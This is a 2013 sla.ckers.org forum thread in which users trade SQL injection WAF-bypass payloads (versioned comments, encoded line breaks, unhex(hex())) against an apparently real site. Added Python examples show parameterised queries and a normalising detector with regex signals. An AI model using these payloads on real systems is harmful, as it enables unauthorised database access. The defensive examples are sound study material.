Sla.ckers.org
How do you completely compromise a machine given a text box or badly validated input box? This is a place to talk about code issues (PHP includes, null byte injection, backticks, pipe, etc...) as well as how to properly construct an SQL injection attack. 
WAF or something wrong!!!!
Posted by: versus
Date: April 19, 2013 07:24PM

Hi, and thanks for this great forum:

I have a problem like this:

www.vuln.org?id=1'
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource

OK

www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,3,4,5,6,7,8,9--

3 and 4

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,version(),4,5,6,7,8,9--

5.5.23-55

OK

This is the problem, the WAF blocks me here!!!!!!!

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!group_concat*/(table_name),4,5,6,7,8,9 from /*!information_schema*/.tables where table_schema=database()--

I have this:

Forbidden

You don't have permission to access / on this server.

So with this

www.vuln.org?id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!table_name*/,4,5,5,6,7,8,9 /*!from*/ /*!InfoRmation_SCHEMa*/.`tables`--

I have:

Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource

Please tell me another option to bypass this WAF, thanks.

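The behaviour the first post describes (a stray quote producing a mysql_fetch_array() warning, and a negative id followed by UNION SELECT returning rows from a different table) is what happens when the raw id parameter is concatenated into the query string. The block below is an added example, not code from the thread or from the site being tested; it uses Python with an in-memory SQLite database and constructed sample rows to show that pattern next to the parameterised version that closes it. Table and column names are assumptions for the illustration.

```python
import sqlite3


def build_db():
    """Constructed sample database: a public articles table and a second table
    the page should never expose."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE articles (id INTEGER PRIMARY KEY, title TEXT, body TEXT)")
    conn.execute("CREATE TABLE users (id INTEGER PRIMARY KEY, username TEXT, email TEXT)")
    conn.executemany(
        "INSERT INTO articles VALUES (?, ?, ?)",
        [(1, "First post", "hello"), (2, "Second post", "world")],
    )
    conn.execute("INSERT INTO users VALUES (?, ?, ?)", (1, "admin", "admin@example.invalid"))
    return conn


def fetch_article_vulnerable(conn, raw_id):
    """Mirrors the pattern behind the warning quoted in the thread: the raw
    query-string value is pasted into the SQL text."""
    sql = "SELECT id, title, body FROM articles WHERE id=" + raw_id
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.OperationalError as exc:
        # Equivalent of PHP's "supplied argument is not a valid MySQL result
        # resource": the statement failed and the failure leaks to the client.
        return f"error: {exc}"


def fetch_article_safe(conn, raw_id):
    """Hardened version: validate the type, then bind the value as a parameter
    so it can never be parsed as SQL."""
    try:
        article_id = int(raw_id)
    except ValueError:
        return None  # reject anything that is not an integer id
    return conn.execute(
        "SELECT id, title, body FROM articles WHERE id=?", (article_id,)
    ).fetchall()


if __name__ == "__main__":
    db = build_db()
    for value in ("1", "1'", "-1 UNION SELECT 1,username,email FROM users--"):
        print(repr(value))
        print("  vulnerable:", fetch_article_vulnerable(db, value))
        print("  safe:      ", fetch_article_safe(db, value))
```

Running the block shows the three observations from the post in order: a plain id works in both versions, the stray quote turns into a database error only in the concatenated version, and the UNION payload returns a row from the other table only in the concatenated version. The parameterised version rejects both bad inputs before they reach the database, which is the fix a WAF rule can only approximate.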
Re: WAF or something wrong!!!!
Posted by: hack2012
Date: April 20, 2013 03:27AM

id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!%0Agroup_concat*/(/*!%0Atable_name*/),4,5,6,7,8,9 from /*!%0Ainformation_schema*/./*!%0Atables*/ where /*!%0Atable_schema*/=/*!%0Adatabase()*/--

Maybe OK, or you can give me the URL.....

Re: WAF or something wrong!!!!
Posted by: thanggiangho
Date: April 30, 2013 07:22AM

I know,
you can use
unhex(hex(table_name))
if error,
you use
unhex(hex(/*!table_name*/))
Good luck :)

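From the defender's side, the requests in this thread all carry the same statement and differ only in how the keywords are wrapped: MySQL /*! ... */ versioned comments, a %0A line break inside the comment, mixed case, and unhex(hex()) around a column name. A rule that matches the raw request text stops the first variant and misses the rest, while the same rule applied after decoding and comment stripping sees one identical statement. The block below is an added example, not part of the thread and not the rule set of any real WAF; it normalises constructed request lines shaped like the ones posted above and reports which signals fire on each. The signal names and regexes are assumptions for the illustration.

```python
import re
from urllib.parse import unquote

# Constructed sample request lines, shaped like the payloads in the thread.
SAMPLE_REQUESTS = [
    "id=1",
    "id=1'",
    "id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,3,4,5,6,7,8,9--",
    "id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,/*!table_name*/,4,5,5,6,7,8,9 "
    "/*!from*/ /*!InfoRmation_SCHEMa*/.`tables`--",
    "id=-1 /*!%0AUNION*/ /*!%0ASELECT*/ 1,2,unhex(hex(/*!table_name*/)),4,5,6,7,8,9--",
]

# MySQL executes the body of /*!NNNNN ... */ comments, so the body must be
# kept; ordinary /* ... */ comments are dropped entirely.
VERSIONED_COMMENT = re.compile(r"/\*!\d{0,6}\s*(.*?)\*/", re.S)
PLAIN_COMMENT = re.compile(r"/\*.*?\*/", re.S)


def normalize(raw):
    """Percent-decode (a few rounds, in case of double encoding), unwrap
    versioned comments, drop plain comments, collapse whitespace, lowercase."""
    text = raw
    for _ in range(3):
        decoded = unquote(text)
        if decoded == text:
            break
        text = decoded
    text = VERSIONED_COMMENT.sub(r" \1 ", text)
    text = PLAIN_COMMENT.sub(" ", text)
    return re.sub(r"\s+", " ", text).strip().lower()


# Signals evaluated on the normalised text, not on the raw request.
SIGNALS = [
    ("union_select", re.compile(r"\bunion\b\s+(?:all\s+)?select\b")),
    ("schema_probe", re.compile(r"\binformation_schema\b")),
    ("unhex_hex", re.compile(r"\bunhex\s*\(\s*hex\s*\(")),
]


def classify(raw):
    """Return the names of the signals that match one request line."""
    normalized = normalize(raw)
    return [name for name, pattern in SIGNALS if pattern.search(normalized)]


def scan(lines):
    """Classify every line; returns (line, signals) pairs for review or alerting."""
    return [(line, classify(line)) for line in lines]


if __name__ == "__main__":
    for line, hits in scan(SAMPLE_REQUESTS):
        print(f"{hits or ['-']}  {normalize(line)}")
```

The comparison worth noting is between the third and fourth sample lines: the raw text of the fourth contains neither "union select" nor a lowercase "information_schema", yet after normalisation both lines reduce to the same statement shape and both are flagged. Normalising before matching is the standard way to keep a detection rule stable against comment and encoding variation, and it is also the right place to log the normalised form so that analysts reviewing alerts see the statement rather than the wrapper.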